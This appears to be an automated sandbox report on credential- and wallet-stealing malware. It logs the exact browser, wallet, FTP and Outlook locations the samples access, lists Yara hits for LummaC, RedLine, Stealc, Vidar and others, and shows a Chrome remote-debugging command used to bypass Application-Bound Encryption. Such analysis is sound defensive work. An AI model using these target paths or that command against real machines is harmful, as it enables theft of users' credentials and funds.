Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004	Jump to behavior

Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\SQRKHNBNYN	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Directory queried: C:\Users\user\Documents\SQRKHNBNYN	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	Directory queried: C:\Users\user\Documents\WKXEWIOTXI
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	Directory queried: C:\Users\user\Documents\WKXEWIOTXI
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO
Source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe	Directory queried: C:\Users\user\Documents\DTBZGIOOSO

Source: Yara match	File source: 00000002.00000002.2187564208.000000000113E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1747846572.000000000192E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1747879778.00000000018D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2187564208.0000000001197000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: random.exe PID: 7308, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 4CAJNBDWED5ZLJ2B.exe PID: 7676, type: MEMORYSTR

Remote Access Functionality

Attempt to bypass Chrome Application-Bound Encryption

Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe

Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: random.exe PID: 7308, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Yara detected PureLog Stealer

Source: Yara match	File source: 76.2.095fb861eb.exe.3c29550.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 76.2.095fb861eb.exe.3c29550.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 76.0.095fb861eb.exe.630000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000004C.00000000.2555274207.0000000000632000.00000002.00000001.01000000.0000001D.sdmp, type: MEMORY
Source: Yara match	File source: 0000004C.00000002.2921128413.0000000003C29000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1071540001\095fb861eb.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1071551001\2ac0b54336.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1071545001\1AWhJsY.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[3].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\1AWhJsY[1].exe, type: DROPPED

Yara detected RedLine Stealer

Source: Yara match

File source: dump.pcap, type: PCAP

Yara detected Stealc

Source: Yara match	File source: 00000002.00000002.2187564208.000000000113E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2185747966.0000000000401000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1865551191.0000000004E60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 4CAJNBDWED5ZLJ2B.exe PID: 7676, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: Process Memory Space: 4CAJNBDWED5ZLJ2B.exe PID: 7676, type: MEMORYSTR

Yara detected zgRAT

Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1071545001\1AWhJsY.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\1AWhJsY[1].exe, type: DROPPED

Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	Code function: 2_2_6C570C40 sqlite3_bind_zeroblob,	2_2_6C570C40
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	Code function: 2_2_6C570D60 sqlite3_bind_parameter_name,	2_2_6C570D60
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	Code function: 2_2_6C498EA0 sqlite3_clear_bindings,	2_2_6C498EA0
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	Code function: 2_2_6C570B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,	2_2_6C570B40
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	Code function: 2_2_6C496410 bind,WSAGetLastError,	2_2_6C496410
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	Code function: 2_2_6C49C050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp,	2_2_6C49C050
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	Code function: 2_2_6C496070 PR_Listen,	2_2_6C496070
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	Code function: 2_2_6C49C030 sqlite3_bind_parameter_count,	2_2_6C49C030
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	Code function: 2_2_6C4960B0 listen,WSAGetLastError,	2_2_6C4960B0
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	Code function: 2_2_6C4222D0 sqlite3_bind_blob,	2_2_6C4222D0
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	Code function: 2_2_6C4963C0 PR_Bind,	2_2_6C4963C0
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	Code function: 2_2_6C499400 sqlite3_bind_int64,	2_2_6C499400
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	Code function: 2_2_6C4994C0 sqlite3_bind_text,	2_2_6C4994C0
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	Code function: 2_2_6C4994F0 sqlite3_bind_text16,	2_2_6C4994F0
Source: C:\Users\user\AppData\Local\Temp\4CAJNBDWED5ZLJ2B.exe	Code function: 2_2_6C499480 sqlite3_bind_null,	2_2_6C499480

Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\cBeNU75[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1071544001\cBeNU75.exe, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	121 Windows Management Instrumentation	1 Scripting	1 DLL Side-Loading	41 Disable or Modify Tools	2 OS Credential Dumping	1 System Time Discovery	Remote Services	11 Archive Collected Data	14 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	2 Bypass User Account Control	11 Deobfuscate/Decode Files or Information	LSASS Memory	12 File and Directory Discovery	Remote Desktop Protocol	41 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	11 Scheduled Task/Job	11 Scheduled Task/Job	1 Extra Window Memory Injection	41 Obfuscated Files or Information	Security Account Manager	2510 System Information Discovery	SMB/Windows Admin Shares	11 Email Collection	11 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	2 PowerShell	11 Registry Run Keys / Startup Folder	312 Process Injection	32 Software Packing	NTDS	1 Query Registry	Distributed Component Object Model	Input Capture	1 Remote Access Software	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	11 Scheduled Task/Job	1 Timestomp	LSA Secrets	1071 Security Software Discovery	SSH	Keylogging	4 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	11 Registry Run Keys / Startup Folder	1 DLL Side-Loading	Cached Domain Credentials	3 Process Discovery	VNC	GUI Input Capture	115 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Bypass User Account Control	DCSync	471 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Extra Window Memory Injection	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	111 Masquerading	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	471 Virtualization/Sandbox Evasion	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	312 Process Injection	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	1 Mshta	Keylogging	Process Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

